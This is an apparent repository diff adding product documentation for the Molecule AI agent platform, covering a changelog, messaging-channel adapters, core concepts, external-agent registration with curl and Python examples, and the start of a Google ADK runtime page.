of text-in-prompt injection. Structured tool definitions, better token efficiency,
and full compatibility with Nous/Hermes-3 tool call format.
(#644)
#### Hermes — structured output (`response_format`)
`response_format=json_schema` is now wired through to the model. Hermes
workspaces can request strict JSON output against a defined schema.
(#645)
#### AGENTS.md auto-generation
Platform workspaces now auto-generate an `AGENTS.md` file in the workspace
container at boot. The file lists all peer workspaces visible to this workspace,
their roles, and their capabilities — giving LLMs automatic context about the
org topology without manual prompt engineering.
(#763)
#### Discord channel adapter
A new Discord adapter joins Telegram, Slack, and Lark. Configure with a
`bot_token` and `channel_id` to send and receive messages on Discord.
(#656)
#### Per-workspace budget limits
Set a `budget_limit` (USD) on any workspace. The A2A executor enforces the limit
at task dispatch — tasks that would exceed the monthly cap are rejected with a
`429 Budget Exceeded` error. Configure via `PATCH /workspaces/:id`.
(#611, #606)
#### Per-workspace token metrics
`GET /workspaces/:id/metrics` returns token counts (input, output, cache read/write)
aggregated over rolling 1-hour and 30-day windows. Live usage is displayed in the
canvas WorkspaceUsage panel.
(#602, #627)
#### Claude Opus 4.7 — effort levels and task budget
Workspace config now exposes `effort` (`low` / `medium` / `high` / `xhigh` /
`max`) and `task_budget` (token ceiling) for Anthropic Claude workspaces.
`xhigh` and `max` activate extended thinking (Opus 4.7+ only). Configure in the
Canvas Config tab or via `PATCH /workspaces/:id`.
(#639, #654, #669)
#### Plugin supply-chain hardening
All plugin refs must now be pinned (no `latest`, no floating branches). Unpinned
refs are blocked at load time unless `PLUGIN_ALLOW_UNPINNED=true`. SHA-256
integrity checking available for plugin archives.
(#775)
#### Org-level plugin governance registry
A new per-org allowlist controls which plugins workspaces in that org are
permitted to load. Managed via `POST/DELETE /admin/orgs/:orgId/plugins/allowlist`.
(#610)
#### Schedule health endpoint
`GET /admin/schedules/health` returns cross-workspace cron health: last-fired,
next-scheduled, consecutive-empty count, and phantom detection status for every
schedule in the org.
(#671, #796)
#### Fly Machines provisioner
The platform now supports `PROVISIONER=flyio` — workspaces are provisioned as
Fly Machines instead of Docker containers or EC2 instances. See the
[self-hosting guide](/docs/self-hosting).
(#578 — docs PR #7)
### 🔒 Security
- **Auth hardening** — PATCH `/workspaces/:id` now requires ownership
validation; UUID fields are validated before DB queries; input lengths bounded
across all handlers. (#692, #701)
- **Admin token isolation** — `AdminAuth` middleware correctly rejects workspace
bearer tokens when `ADMIN_TOKEN` is set, preventing privilege escalation from
workspace token → admin. (#684, #729)
- **Metrics route auth** — `GET /workspaces/:id/metrics` now requires workspace
bearer token; previously it was unauthenticated. (#696)
- **X-Workspace-ID forgery** — Requests spoofing the `system-caller/` prefix in
`X-Workspace-ID` headers are rejected. (#766)
- **GLOBAL memory injection safeguards** — `commit_memory` with `scope: GLOBAL`
now validates content for prompt injection patterns before persisting. (#769)
- **Security headers** — `X-Content-Type-Options: nosniff` and
`X-Frame-Options: DENY` added to all API responses. (#629)
- **Token revocation hardening** — Revoked tokens are purged from the in-memory
cache within 60s; previously the cache could serve revoked tokens until TTL
expiry. (#696)
- **MCP server** — npm version pinned; `-y` flag removed from install commands.
(SAFE-MCP NEW-003, #808 — docs PR #18)
- **Canvas test-token endpoint** — gated behind `AdminAuth` and removed from
general router. (#612, #708)
### 🔧 Fixes
- Fixed `POST /workspaces` not persisting the secrets envelope on create. (#568)
- Fixed self-delegation deadlock when a workspace delegates to itself. (#570)
- Fixed GitHub installation token expiry — tokens now refresh automatically before
expiry rather than failing mid-operation. (#567)
- Fixed `TenantGuard` same-origin bypass for EC2 tenant Canvas. (#584)
- Fixed pgvector migration to wrap in `DO` block, eliminating E2E CI failures
from duplicate extension install. (#843, #670, #636)
- Fixed scheduler dropping schedules with `NULL next_run_at` permanently. (#728)
- Fixed `ValidateToken` not checking `removed` workspace status, allowing tokens
for deleted workspaces to authenticate. (#719)
- Fixed canvas hydration error UI, radio keyboard nav, and zoom-to-team
shortcut. (#565)
- Fixed canvas UX: error handling, accessibility, loading state. (#587)
- Fixed canvas deploy preflight to require env keys for Hermes and Gemini CLI
runtimes. (#588)
- Fixed budget/spend counters capping before DB upsert to prevent NUMERIC
overflow. (#630, #634)
- Fixed pgvector TEXT→UUID FK type mismatch in migrations 028 and 031 that
blocked all E2E runs. (#646, #670, #843)
- Fixed duplicate hook firings (34×) in `dedup_settings_hooks`. (#551, #597)
- Accessibility fixes: keyboard access on `TeamMemberChip`, `role=alert` on
status banners, close button label, `ProvisioningTimeout` modal. (#841)
### 📚 Docs
- Google ADK runtime — added hands-on Quickstart section. (docs PR #8)
- Hermes — full runtime reference page. (docs PR #9)
- AGENTS.md — auto-generation documented in concepts. (docs PR #10)
- Semantic memory search — `?q=` param documented in API reference. (docs PR #11)
- Canvas A2A topology overlay + audit trail panel. (docs PR #12)
- molecule-medo plugin — opt-in platform plugin page. (docs PR #13)
- Workspace hibernation — status lifecycle, endpoints, auto-wake behaviour. (docs PR #14)
- molecule-audit-ledger — HMAC chain, `/audit` endpoint, `LedgerHooks`, CLI. (docs PR #15)
- Hermes stacked system messages — `system_blocks` kwarg. (docs PR #16)
- Plugin supply chain security — pinned refs required, SHA-256 integrity. (docs PR #17)
- SAFE-MCP audit report 2026-04-17. (docs PR #18)
- Temporal workflow checkpoints — step endpoints, auto-resume behaviour. (docs PR #19)
---
_Changelog entries are compiled by the [Documentation Specialist](https://github.com/Molecule-AI) from all merged pull requests for the day. Times are UTC._

338
content/docs/channels.mdx Normal file
View File

@ -0,0 +1,338 @@
---
title: Channels
description: Connect workspaces to Telegram, Slack, Discord, and Lark/Feishu for social integrations.
---
## Overview
Channels let workspaces send and receive messages on social platforms. Each
workspace can have multiple channel integrations — a Telegram bot, a Slack
webhook, a Discord webhook, a Lark/Feishu Custom Bot — configured independently with per-channel
allowlists and JSONB config.
Outbound messages flow from the workspace through the platform adapter to the
social platform. Inbound messages arrive via webhooks (`POST /webhooks/:type`),
are parsed by the adapter, and forwarded to the workspace as A2A
`message/send` requests.
```
User (Telegram/Slack/Discord/Lark) ──webhook──> Platform ──A2A──> Workspace Agent
<──adapter── (response)
User <──bot message────────────────────────────────────────────────/
```
---
## Adapters
Four adapters are registered out of the box. Use `GET /channels/adapters` to
list them at runtime.
### Telegram
Uses the Telegram Bot API. Supports both long-polling (for inbound) and direct
API calls (for outbound). The adapter caches `BotAPI` instances to avoid
repeated `getMe` calls.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `bot_token` | string | Telegram bot token (`123456789:ABCdef...`). Validated against a strict regex. |
| `chat_id` | string | Comma-separated chat IDs to listen on and send to. |
**Features:**
- Long-polling with 30s timeout and 2s retry interval
- Auto-reply to `/start` with the chat ID (useful for setup)
- Bot commands: `/start`, `/help`, `/reset` (clear history), `/cancel` (best-effort)
- Long messages automatically split at paragraph/line/word boundaries (4096 char limit)
- Typing indicator sent while the agent processes
- Rate-limit handling with `retry_after` backoff
- Auto-discovers chats via `getUpdates` (including `my_chat_member` events for group adds)
- Auto-disables the channel when the bot is kicked from a chat
### Slack
Supports two outbound modes — Bot Token (recommended) and Incoming Webhook
(legacy). Inbound uses the Slack Events API in both modes.
**Config fields:**
| Field | Type | Required | Description |
|-------|------|----------|-------------|
| `bot_token` | string | One of `bot_token` / `webhook_url` | Slack Bot User OAuth Token (`xoxb-…`). Enables per-agent display name and icon via `chat:write.customize`. |
| `webhook_url` | string | One of `bot_token` / `webhook_url` | Incoming Webhook URL (must start with `https://hooks.slack.com/`). Used as fallback when `bot_token` is absent. |
| `channel` | string | Required with `bot_token` | Target channel ID or name (e.g. `C01234ABCDE` or `#general`). |
| `username` | string | Optional | Display name override shown in Slack (Bot Token mode only). |
| `icon_emoji` | string | Optional | Emoji icon for the agent's avatar (e.g. `:robot_face:`). Bot Token mode only. |
**Features:**
- **Bot Token mode** — per-agent identity: each workspace can post with its own
name and icon using `chat.postMessage` + `chat:write.customize`. Markdown is
automatically converted to Slack `mrkdwn` format.
- **Webhook mode** — simple outbound-only integration, no OAuth required.
- Inbound via Events API JSON payload or slash command (URL-encoded form).
- `url_verification` challenge handshake supported.
- Slash commands prepend the command name so the agent sees the full invocation.
**Required Slack app scopes (Bot Token mode):**
`chat:write`, `chat:write.customize`, `channels:history`, `app_mentions:read`
### Discord
Uses Discord Incoming Webhooks for outbound and Discord Interactions (slash commands) for inbound. Discord uses a push-based interactions model — there is no long-polling; the platform receives signed payloads at the interactions endpoint.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `webhook_url` | string | Discord Incoming Webhook URL. Must start with `https://discord.com/api/webhooks/`. Validated on creation (matches the Slack SSRF-guard pattern). |
**Global secret:**
```bash
# Register the webhook URL as a global or per-workspace secret
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"DISCORD_WEBHOOK_URL","value":"https://discord.com/api/webhooks/..."}'
```
**Features:**
- Outbound via Incoming Webhook — POSTs `{"content": "<text>"}` to the webhook URL
- Long messages automatically split at newline/space boundaries (Discord 2000-character hard limit)
- Inbound via Discord Interactions — no long-polling; Discord pushes signed payloads
- **Type 1 PING** — router layer responds `{"type":1}`; adapter returns `nil` (no A2A forward)
- **Type 2 APPLICATION\_COMMAND** — slash command, forwarded as `/commandname option1 option2`
- **Type 3 MESSAGE\_COMPONENT** — button/select interaction, forwarded as component data
- User identity prefers `member.user` (guild) over `user` (DM) for consistent routing
- `StartPolling` is a no-op (returns nil) — Discord uses interactions, not polling
**Setup:**
1. **Incoming Webhook** — Discord Server → channel settings → Integrations → Webhooks → New Webhook → Copy Webhook URL
2. Add as a secret: `PUT /settings/secrets` with `DISCORD_WEBHOOK_URL`
3. **Slash commands (inbound)** — create a Discord Application at [discord.com/developers](https://discord.com/developers/applications), set the **Interactions Endpoint URL** to `https://<platform-host>/webhooks/discord`
4. Verify the endpoint: Discord sends a type-1 PING; the platform responds `{"type":1}` automatically
**Example config:**
```json
{
"type": "discord",
"config": {
"webhook_url": "https://discord.com/api/webhooks/1234567890/abcdef..."
}
}
```
<Callout type="info">
Discord does not support bot-initiated long-polling. Inbound messages only work via slash commands registered in your Discord Application. If you only need outbound (workspace → Discord), no Application setup is required — just add the webhook URL.
</Callout>
---
### Lark / Feishu
Outbound via Custom Bot webhooks, inbound via Event Subscriptions.
**Required config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `webhook_url` | string | Custom Bot webhook URL. Must start with `https://open.feishu.cn/open-apis/bot/v2/hook/` or `https://open.larksuite.com/open-apis/bot/v2/hook/`. |
**Optional config fields:**
| Field | Type | Description |
|-------|------|-------------|
| `verify_token` | string | Verification Token from the app's Event Subscriptions page. When set, inbound events with a mismatching token are rejected. |
**Features:**
- Both China (`open.feishu.cn`) and international (`open.larksuite.com`) endpoints supported
- `url_verification` handshake with constant-time `verify_token` comparison
- v2 event payload parsing (`im.message.receive_v1`)
- Token verification on both `url_verification` and `event_callback` payloads
- Application-level error codes checked (Lark returns HTTP 200 even for app errors)
---
## Setup Flow
### 1. Create a Channel
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz",
"chat_id": "-1001234567890"
}
}'
```
### 2. Test the Connection
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/test \
-H "Authorization: Bearer {token}"
```
### 3. Send a Message
```bash
curl -X POST http://localhost:8080/workspaces/{id}/channels/{channelId}/send \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"text": "Hello from the agent!"}'
```
---
## Inbound Webhooks
Register your platform's public URL as the webhook endpoint for each social
platform. Inbound messages arrive at:
```
POST /webhooks/:type
```
where `:type` is `telegram`, `slack`, `discord`, or `lark`. The platform:
1. Looks up all channels of that type
2. Calls the adapter's `ParseWebhook` to extract a standardized `InboundMessage`
3. Checks the allowlist (if configured)
4. Forwards the message to the workspace via A2A `message/send`
For Telegram, the platform can also use long-polling instead of webhooks,
started automatically when a Telegram channel is created.
For Discord, the platform automatically handles type-1 PING interactions (required by Discord for endpoint verification) and forwards type-2 and type-3 interaction payloads to the workspace.
---
## Discover Chats
Auto-detect available chats for a bot token before creating a channel:
```bash
curl -X POST http://localhost:8080/channels/discover \
-H "Content-Type: application/json" \
-d '{"type": "telegram", "bot_token": "123456789:ABCdef..."}'
```
Returns the bot username, discovered chats (with IDs, names, and types), and
whether the bot can read all group messages (Telegram privacy mode).
---
## Allowlists
Each channel row has an `allowed_users` JSONB array. When non-empty, only
messages from users whose IDs appear in the list are forwarded to the workspace.
All others are silently dropped.
---
## Config Encryption
Sensitive config fields (like `bot_token`) are encrypted at rest. The `List`
endpoint decrypts them server-side and masks tokens in the response
(showing only the first 4 and last 4 characters).
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/channels/adapters` | List available adapter types |
| POST | `/channels/discover` | Auto-detect chats for a bot token |
| GET | `/workspaces/:id/channels` | List channels for a workspace |
| POST | `/workspaces/:id/channels` | Add a channel |
| PATCH | `/workspaces/:id/channels/:channelId` | Update a channel |
| DELETE | `/workspaces/:id/channels/:channelId` | Remove a channel |
| POST | `/workspaces/:id/channels/:channelId/test` | Test connection |
| POST | `/workspaces/:id/channels/:channelId/send` | Send outbound message |
| POST | `/webhooks/:type` | Incoming social webhook |
---
## Example Configs
### Telegram
```json
{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
"chat_id": "-1001234567890"
}
}
```
Multiple chats (comma-separated):
```json
{
"type": "telegram",
"config": {
"bot_token": "123456789:ABCdefGHIjklmnopQRSTuvwxyz_1234",
"chat_id": "-1001234567890, -1009876543210"
}
}
```
### Slack
```json
{
"type": "slack",
"config": {
"webhook_url": "https://hooks.slack.com/services/YOUR/WEBHOOK/URL"
}
}
```
### Discord
```json
{
"type": "discord",
"config": {
"webhook_url": "https://discord.com/api/webhooks/1234567890123456789/abcdefGHIjklmnopQRSTuvwxyz_1234"
}
}
```
### Lark / Feishu
```json
{
"type": "lark",
"config": {
"webhook_url": "https://open.larksuite.com/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx",
"verify_token": "your-verification-token"
}
}
```
China endpoint:
```json
{
"type": "lark",
"config": {
"webhook_url": "https://open.feishu.cn/open-apis/bot/v2/hook/xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"
}
}
```

216
content/docs/concepts.mdx Normal file
View File

@ -0,0 +1,216 @@
---
title: Concepts
description: The core primitives that compose every Molecule AI org — workspaces, plugins, channels, schedules, tokens, external agents, and the canvas.
---
## Workspaces
A **workspace** is a real Docker container running a real LLM agent. Each
workspace has:
- A **role** (a one-line job description fed into its system prompt — also
written to `/workspace/AGENTS.md` so peers can discover it)
- An **initial prompt** (run once at first boot — typically clone repo,
read docs, memorise context)
- A **runtime** (`claude-code`, `langgraph`, `crewai`, `autogen`, `deepagents`,
`openclaw`, `hermes`, `gemini-cli`, [`google-adk`](/docs/google-adk))
- A **tier** (resource budget — T1 sandboxed, T2 standard, T3 privileged, T4 full-host)
- An optional **parent** (forms the org tree)
- An optional **workspace_dir** (a host path bind-mounted into the
container — gives the agent direct access to your codebase)
- An optional **budget_limit** (workspace-level spend cap — see [Workspace budgets](#workspace-budgets) below)
Workspaces talk to each other via **A2A** (agent-to-agent) messages, routed
by the platform. Communication rules: same workspace, siblings, and
parent/child are allowed; everything else is denied.
See the [API Reference](/docs/api-reference#budget) for the full endpoint specification.
### Workspace status lifecycle
| Status | Meaning | Resumes via |
|--------|---------|-------------|
| `provisioning` | Container being started | automatic |
| `online` | Running and accepting tasks | — |
| `degraded` | Heartbeat `error_rate > 0.5` | auto-recovers |
| `offline` | Missed heartbeats (liveness sweep) | auto-restart |
| `paused` | Manually stopped via `/pause` | `POST /resume` |
| `hibernated` | Auto-paused after idle timeout (or via `/hibernate`) | automatic on next A2A message |
| `removed` | Deleted | — |
**Hibernation** is an opt-in automatic cost-saving mode. Set `hibernation_idle_minutes` in the workspace's `config.yaml` to enable it. When a hibernated workspace receives an A2A message, the platform wakes it automatically (returning `503 Retry-After: 15` while it comes online). See [API Reference — Lifecycle](/docs/api-reference#lifecycle) for the `/hibernate` endpoint and configuration details.
## External agents
An **external agent** is a workspace with `runtime: external` — it runs on
your own infrastructure instead of the platform's Docker network. External
agents:
- Register via `POST /registry/register` and receive a bearer token
- Send heartbeats every 30 seconds to stay online
- Accept A2A messages at their registered URL
- Appear on the canvas with a purple **REMOTE** badge
- Skip Docker health sweep (liveness is heartbeat-only)
See [External Agents](/docs/external-agents) for the full registration guide.
## Plugins
A **plugin** is a bundle of capabilities a workspace can install:
- **Hooks** — `PreToolUse`, `PostToolUse`, `UserPromptSubmit` — for
guardrails, audit trails, dangerous-command refusal
- **Skills** — multi-criteria code review, cross-vendor adversarial
review, LLM-as-judge gates
- **Slash commands** — `/triage`, `/retro`, etc.
- **MCP servers** — bring in tools the model can call
Plugins have two axes: **source** (where to fetch — `local://`, `github://`)
and **shape** (what's inside — agentskills.io format, MCP server, etc.).
Plugins compose. Per-workspace plugin lists **UNION** with the org-wide
defaults — adding one capability to one role doesn't require re-listing
every default. Use `!plugin-name` to opt a specific default out.
See [Plugins](/docs/plugins) for the full guide.
## Channels
A **channel** wires a workspace to an external messaging platform:
| Adapter | Platform | Config |
|---------|----------|--------|
| `telegram` | Telegram | Bot token + chat_id allowlist |
| `slack` | Slack | Workspace token + channel |
| `lark` | Lark / Feishu | Custom Bot webhook + Event Subscriptions |
Once connected, users can talk to agents from outside the canvas — and
agents can broadcast back. Inbound messages arrive via webhook and are
routed to the workspace as A2A messages.
See [Channels](/docs/channels) for setup instructions.
## Schedules
A **schedule** is a cron-driven recurring prompt. Each tick fires an A2A
message into the workspace, which the agent treats as a new task. Schedules
are supervised — panics in the dispatch path are recovered with exponential
backoff, and a liveness watchdog surfaces stuck subsystems via
`/admin/liveness`.
Schedules let you build the *evolution* loop: hourly security audits,
daily ecosystem watches, weekly plugin curation, etc.
See [Schedules](/docs/schedules) for the full guide.
## Tokens
**Bearer tokens** authenticate agents and API clients. Each token is
scoped to a single workspace — a token from workspace A cannot access
workspace B.
- Issued on first registration (`POST /registry/register`)
- Create/list/revoke via `GET/POST/DELETE /workspaces/:id/tokens`
- 256-bit entropy, sha256-hashed in DB, plaintext shown once
See [Token Management](/docs/tokens) for the full guide.
## The canvas
The **canvas** is a Next.js 15 React Flow visualisation of your org.
Every workspace is a node. Every A2A message is an edge. Every memory
write, every scheduled fire, every status change pushes a WebSocket
event in real time.
The canvas isn't just a viewer — it's the operator surface. Drag nodes
to reorganise teams, click to chat, right-click for actions, watch the
team work in real time.
### A2A Topology Overlay
The canvas renders **live delegation edges** on top of the workspace graph.
When one agent delegates to another, a directed edge appears:
- **Animated violet** — delegation occurred within the last 5 minutes
- **Static blue** — delegation occurred earlier
The overlay polls `GET /workspaces/:id/activity?type=delegation` for every
visible node every 60 seconds. Toggle it on/off with the **A2A** button in
the toolbar (⊞ mesh icon) — the setting persists across page loads.
### Audit Trail Panel
Every workspace's **Side Panel → Audit** tab (⊟ ledger icon) shows the
workspace's tamper-evident audit ledger via `GET /workspaces/:id/audit`.
Each entry records what happened (event type, actor, outcome) and whether
its hash chain is intact.
| Event type | Colour | Meaning |
|-----------|--------|---------|
| `delegation` | Blue | An A2A delegation was made or received |
| `decision` | Violet | A gate or approval decision was recorded |
| `gate` | Yellow | A HITL or automated gate was evaluated |
| `hitl` | Orange | A human-in-the-loop approval request |
Entries with `chain_valid: false` display a red ⚠ tamper indicator —
investigate immediately; the audit chain may have been modified offline.
Use the event-type filter bar at the top of the panel to narrow results.
Click **Load more** to paginate (cursor-based, 50 entries per page).
### Memory Inspector panel
The **Memory Inspector** (Side Panel → Memory tab, 🧠 icon) lets you browse, search, and inspect all `LOCAL` and `TEAM` memory keys for any workspace — live, without leaving the canvas.
- **Browse** — all memory keys for the selected workspace, grouped by HMA scope (`LOCAL`, `TEAM`)
- **Semantic search** — enter a query to run `GET /workspaces/:id/memories?q=<query>` against the vector index; results are colour-coded by cosine similarity score
- **Inspect** — click any key to expand its full value and metadata (`created_at`, scope, last writer)
The inspector polls on workspace selection change and on each heartbeat. Changes from agents running in parallel appear within one heartbeat cycle (~15s).
## How they fit together
A typical org definition:
```yaml
org_name: My Team
defaults:
runtime: claude-code
tier: 2
plugins: [ecc, molecule-dev, superpowers, molecule-careful-bash]
category_routing:
security: [Backend Engineer]
ui: [Frontend Engineer]
workspaces:
- name: PM
role: "Product manager — triages issues, reviews PRs, unblocks the team."
canvas: { x: 400, y: 50 }
plugins: [molecule-workflow-triage]
channels:
- type: telegram
config: { bot_token: "${TELEGRAM_BOT_TOKEN}", chat_id: "12345" }
children:
- name: Dev Lead
role: "Tech lead — coordinates engineering sub-teams and owns architecture."
children:
- name: Frontend Engineer
role: "Frontend specialist — React, TypeScript, Canvas UI."
- name: Backend Engineer
role: "Backend specialist — Go platform, API, migrations, CI."
schedules:
- name: Hourly typecheck
cron_expr: "0 * * * *"
prompt: "Run npm run typecheck and report any new errors..."
```
That's the mental model. Templates → plugins → channels → schedules →
tokens → canvas. Everything else in the docs is depth on one of these
primitives.
## MCP integration
Any MCP-compatible AI agent can manage Molecule AI workspaces using the
[MCP Server](/docs/mcp-server) — 87 tools covering workspace CRUD,
communication, secrets, memory, files, schedules, channels, plugins,
and more. Install via `npx @molecule-ai/mcp-server`.

View File

@ -1,3 +1,6 @@
---
title: "Build Order"
---
# Build Order
The core loop to prove first: **workspace registers -> canvas shows it -> heartbeat keeps it alive -> workspace goes offline -> canvas shows it gray.**

View File

@ -1,3 +1,6 @@
---
title: "Code Sandbox"
---
# Code Sandbox
The code sandbox isolates agent-generated code execution — specifically the `run_code` tool that executes dynamically generated scripts. Not user-submitted code (there is no user code submission in Molecule AI) — the agent's own generated code is what needs sandboxing.

View File

@ -1,3 +1,6 @@
---
title: "Constraints & Rules"
---
# Constraints & Rules
Key design rules and invariants that must be followed throughout the codebase.

View File

@ -1,3 +1,6 @@
---
title: "Local Development"
---
# Local Development
## Starting the Stack

View File

@ -1,3 +1,6 @@
---
title: "Observability (Langfuse)"
---
# Observability (Langfuse)
## Overview

View File

@ -1,3 +1,6 @@
---
title: "E2E Testing"
---
# E2E Testing
End-to-end test scripts live under `tests/e2e/` and exercise the platform against a real Postgres + Redis. Every script is shellcheck-clean and shares helpers from `tests/e2e/_lib.sh` + `tests/e2e/_extract_token.py`.

View File

@ -0,0 +1,239 @@
---
title: External Agents
description: Register agents running outside the platform's Docker network as first-class workspaces on the canvas.
---
External agents are AI agents running on your own infrastructure — a different
cloud, an edge device, or your laptop — that join the Molecule AI canvas as
first-class workspaces. They communicate with other agents via A2A, appear on
the canvas with a purple **REMOTE** badge, and are managed like any other workspace.
## Prerequisites
- A running Molecule AI platform (default `http://localhost:8080`)
- Your agent must expose an HTTP endpoint that accepts A2A JSON-RPC messages
## Step 1 — Create the workspace
```bash
curl -X POST http://localhost:8080/workspaces \
-H "Content-Type: application/json" \
-d '{
"name": "My External Agent",
"external": true,
"url": "https://my-agent.example.com",
"tier": 2
}'
```
The response includes the workspace `id`. Save it.
<Callout type="warn">
URLs must be publicly reachable. Private IPs (10.x, 172.16.x, 192.168.x, 127.x,
169.254.x) are rejected for SSRF protection.
</Callout>
## Step 2 — Register with the platform
```bash
curl -X POST http://localhost:8080/registry/register \
-H "Content-Type: application/json" \
-d '{
"workspace_id": "<id-from-step-1>",
"url": "https://my-agent.example.com",
"agent_card": {
"name": "My Agent",
"description": "Research assistant",
"skills": ["research", "analysis"],
"runtime": "external"
}
}'
```
The response includes `auth_token` — **save this immediately**, it is shown only
once and cannot be recovered.
## Step 3 — Start the heartbeat loop
Send a heartbeat every 30 seconds to keep your workspace online:
```bash
curl -X POST http://localhost:8080/registry/heartbeat \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <auth_token>" \
-d '{
"workspace_id": "<id>",
"status": "online",
"active_tasks": 0,
"current_task": "",
"error_rate": 0.0,
"uptime_seconds": 3600
}'
```
If the heartbeat stops for 60 seconds, the workspace automatically goes offline.
## Step 4 — Handle incoming A2A messages
Your agent must accept POST requests at the registered URL with A2A JSON-RPC format:
```json
{
"jsonrpc": "2.0",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"type": "text", "text": "Hello from another agent"}]
}
},
"id": "req-123"
}
```
Respond with a JSON-RPC result:
```json
{
"jsonrpc": "2.0",
"result": {
"status": "completed",
"artifacts": [
{
"parts": [{"type": "text", "text": "Hello back!"}]
}
]
},
"id": "req-123"
}
```
## Step 5 — Send messages to other agents
```bash
curl -X POST http://localhost:8080/workspaces/<target-id>/a2a \
-H "Content-Type: application/json" \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-workspace-id>" \
-d '{
"jsonrpc": "2.0",
"method": "message/send",
"params": {
"message": {
"role": "user",
"parts": [{"type": "text", "text": "Can you help with this?"}]
}
},
"id": "msg-001"
}'
```
## Step 6 — Discover peers
```bash
# Your workspace info
curl http://localhost:8080/registry/discover/<your-id> \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-id>"
# Find siblings/parent/child workspaces
curl http://localhost:8080/registry/<your-id>/peers \
-H "Authorization: Bearer <auth_token>" \
-H "X-Workspace-ID: <your-id>"
```
## Communication rules
| Relationship | Allowed? |
|---|---|
| Same workspace | Yes |
| Siblings (same parent) | Yes |
| Parent to child | Yes |
| Child to parent | Yes |
| Root-level siblings | Yes |
| Everything else | No |
## Python example
```python
import requests
import threading
import time
from flask import Flask, request, jsonify
PLATFORM = "http://localhost:8080"
# 1. Create workspace
ws = requests.post(f"{PLATFORM}/workspaces", json={
"name": "Python Research Agent",
"external": True,
"url": "http://my-host:5000",
"tier": 2,
}).json()
WS_ID = ws["id"]
# 2. Register
reg = requests.post(f"{PLATFORM}/registry/register", json={
"workspace_id": WS_ID,
"url": "http://my-host:5000",
"agent_card": {
"name": "Python Research Agent",
"skills": ["research"],
"runtime": "external",
},
}).json()
TOKEN = reg["auth_token"]
HEADERS = {"Authorization": f"Bearer {TOKEN}"}
# 3. Heartbeat loop
def heartbeat():
while True:
requests.post(f"{PLATFORM}/registry/heartbeat",
json={"workspace_id": WS_ID, "active_tasks": 0},
headers=HEADERS)
time.sleep(30)
threading.Thread(target=heartbeat, daemon=True).start()
# 4. A2A endpoint
app = Flask(__name__)
@app.route("/", methods=["POST"])
def handle_a2a():
data = request.json
text = data["params"]["message"]["parts"][0]["text"]
return jsonify({
"jsonrpc": "2.0",
"result": {
"status": "completed",
"artifacts": [{"parts": [{"type": "text", "text": f"Received: {text}"}]}],
},
"id": data["id"],
})
app.run(host="0.0.0.0", port=5000)
```
## Canvas appearance
External workspaces appear on the canvas with a purple **REMOTE** badge.
They support drag-and-drop positioning, nesting into teams, real-time status
updates via heartbeat, and chat via A2A messages.
## Lifecycle
```
create (POST /workspaces) → online (register) → offline (heartbeat expires)
→ removed (deleted)
```
- External workspaces skip Docker health sweep — only heartbeat TTL matters
- No auto-restart (agent manages its own process)
- Paused external workspaces skip heartbeat monitoring
## Security
- Bearer token required on all authenticated endpoints
- Tokens are 256-bit random, sha256-hashed — only the hash is stored
- Token shown once at registration, never recoverable
- See [Token Management](/docs/tokens) for create/list/revoke API

View File

@ -1,3 +1,6 @@
---
title: "Canvas UI (Next.js Frontend)"
---
# Canvas UI (Next.js Frontend)
The canvas is Molecule AI's operational UI. It is not just a graph viewer. It is the place where teams deploy workspaces, inspect live state, configure runtimes, browse files, watch activity, and chat with agents.

311
content/docs/google-adk.mdx Normal file
View File

@ -0,0 +1,311 @@
---
title: Google ADK Runtime
description: Run Molecule AI workspaces on Google's Agent Development Kit (ADK) — Gemini-native agents with sequential, parallel, and loop workflows.
---
import { Callout } from 'fumadocs-ui/components/callout';
# Google ADK Runtime
The `google-adk` runtime adapter integrates [Google's Agent Development Kit](https://github.com/google/adk-python) (v1.0+, Apache-2.0) into Molecule AI workspaces. ADK is Google's production-grade Python framework for building AI agents backed by Gemini models, with built-in support for sequential, parallel, and loop execution patterns.
<Callout type="info">
Google ADK adapter was added in PR #550 (issue #542). It passes 46/46 tests with 100% coverage.
</Callout>
---
## When to use Google ADK vs other runtimes
| | Google ADK | LangGraph | AutoGen |
|---|---|---|---|
| **Best for** | Gemini-native agents, Google Cloud integrations | Complex stateful graphs, fine-grained flow control | Multi-agent dialogue and code-execution workflows |
| **Model family** | Gemini (gemini-2.0-flash, gemini-1.5-pro, …) | Any LangChain-supported model | Any AutoGen-supported model |
| **Execution model** | Sequential / Parallel / Loop built-in | Explicit graph with nodes and edges | Conversation-driven, agents negotiate through dialogue |
| **Tool support** | Google-native + LangChain tools | LangChain tools | Python functions, code execution |
| **State persistence** | ADK SessionService | LangGraph checkpointer | In-process conversation history |
| **Google Cloud fit** | First-class | Via LangChain integrations | Via plugin |
**Choose Google ADK when:**
- Your workload is Google Cloudnative (Vertex AI, Cloud Tools, Google Workspace)
- You want Gemini models with minimal adapter overhead
- You prefer ADK's opinionated sequential/parallel/loop composition over explicit graph edges
- You're building agents that call Google APIs (Maps, Search, Drive, etc.)
---
## Installation
Each Molecule AI workspace template is a standalone Docker image. The Google ADK workspace template (`molecule-ai-workspace-template-google-adk`) ships with the adapter pre-configured. To use it, set the runtime in your workspace `config.yaml`:
```yaml title="config.yaml"
runtime: google-adk
model: google:gemini-2.0-flash
```
If you are building a custom image on top of `molecule-ai-workspace-runtime`, add the adapter dependency to your `requirements.txt`:
```text title="requirements.txt"
molecule-ai-workspace-runtime>=0.1.0
google-adk>=1.0.0
```
Install manually with pip:
```bash
